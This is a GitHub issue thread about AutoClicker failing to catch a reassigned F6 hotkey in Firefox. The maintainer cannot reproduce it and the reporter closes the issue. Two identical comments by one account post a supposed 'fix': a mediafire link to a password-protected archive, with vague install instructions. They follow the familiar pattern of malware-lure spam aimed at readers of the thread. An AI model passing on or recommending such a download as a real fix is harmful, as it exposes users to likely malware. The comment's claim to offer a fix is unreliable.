### ISSUE TITLE
Not correctly intercepting hotkey

### ISSUE THREAD

**Issue by svaningelgem** [oriash93/AutoClicker#88]
**Describe the bug**
I wanted to test the app on https://clickspeedtest.com/ (on firefox).
when pressed F6 (reassigned toggle hotkey), the address bar was activated, and the autoclicker was not.
The original "OP Auto Clicker 3.0" application that this app is based on did correctly handle that hotkey (ie: no adress bar activation & clicking started)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by oriash93** [comment]
Hey @svaningelgem thanks for taking the time to open an issue.
I can't reproduce this bug, on this site or any other, with either Google Chrome or Mozilla Firefox.

Are you using the latest version of AutoClicker? (v3.3.0)

**Comment by svaningelgem** [comment]
Yes I was using the latest version (3.3.0), but I can't reproduce it anymore...

Closing this ticket.
